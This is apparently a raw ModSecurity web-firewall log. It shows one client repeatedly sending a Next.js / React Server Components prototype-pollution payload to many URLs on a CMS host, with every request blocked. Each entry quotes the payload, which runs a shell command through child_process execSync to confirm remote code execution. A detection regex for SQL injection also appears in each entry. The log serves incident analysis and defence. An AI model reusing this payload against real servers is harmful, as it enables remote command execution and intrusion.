{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJm1zT5TgrBR8xRnfXBPwAAAUQ"] [Sun Apr 05 15:42:47.290922 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:38440] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm17xQSOrq_iRTM7dq_QAAAQs"] [Sun Apr 05 15:42:47.326349 2026] [:error] [pid 13019:tid 13240] [client 172.94.9.253:38432] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJm17xQSOrq_iRTM7dq-wAAAQA"] [Sun Apr 05 15:42:47.354997 2026] [:error] [pid 13019:tid 13248] [client 172.94.9.253:38442] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJm17xQSOrq_iRTM7dq_AAAAQg"] [Sun Apr 05 15:42:47.361222 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:38456] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJm17xQSOrq_iRTM7dq_wAAAQI"] [Sun Apr 05 15:42:47.362889 2026] [:error] [pid 13019:tid 13261] [client 172.94.9.253:38460] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJm17xQSOrq_iRTM7drAAAAARU"] [Sun Apr 05 15:42:47.414753 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:38498] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJm15c83uMXRUE9zvQTtQAAAcU"] [Sun Apr 05 15:42:47.420542 2026] [:error] [pid 23077:tid 23095] [client 172.94.9.253:38486] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm15c83uMXRUE9zvQTtAAAAcw"] [Sun Apr 05 15:42:47.421690 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:38512] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJm17xQSOrq_iRTM7drAgAAAQY"] [Sun Apr 05 15:42:47.422352 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:38474] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJm15c83uMXRUE9zvQTswAAAdc"] [Sun Apr 05 15:42:47.425831 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:38490] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm15c83uMXRUE9zvQTtgAAAcY"] [Sun Apr 05 15:42:47.460621 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:38518] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJm15c83uMXRUE9zvQTtwAAAcM"] [Sun Apr 05 15:42:47.472716 2026] [:error] [pid 1503:tid 1519] [client 172.94.9.253:38548] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJm10I7AjfUQYCN-J7EBAAAAMo"] [Sun Apr 05 15:42:47.475501 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:38522] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJm15c83uMXRUE9zvQTuAAAAc8"] [Sun Apr 05 15:42:47.525360 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:38532] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJm15c83uMXRUE9zvQTuQAAAcE"] [Sun Apr 05 15:42:47.527960 2026] [:error] [pid 13019:tid 13252] [client 172.94.9.253:38558] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm17xQSOrq_iRTM7drBAAAAQw"] [Sun Apr 05 15:42:47.597339 2026] [:error] [pid 22788:tid 22798] [client 172.94.9.253:38596] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJm1yLbhFL16Wsx-C9DEgAAAYg"] [Sun Apr 05 15:42:47.652347 2026] [:error] [pid 1309:tid 1386] [client 172.94.9.253:38618] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1z-XKUNJEHmNu6G70gAAAI8"] [Sun Apr 05 15:42:47.652398 2026] [:error] [pid 13019:tid 13241] [client 172.94.9.253:38568] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm17xQSOrq_iRTM7drBwAAAQE"] [Sun Apr 05 15:42:47.652796 2026] [:error] [pid 23077:tid 23099] [client 172.94.9.253:38582] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 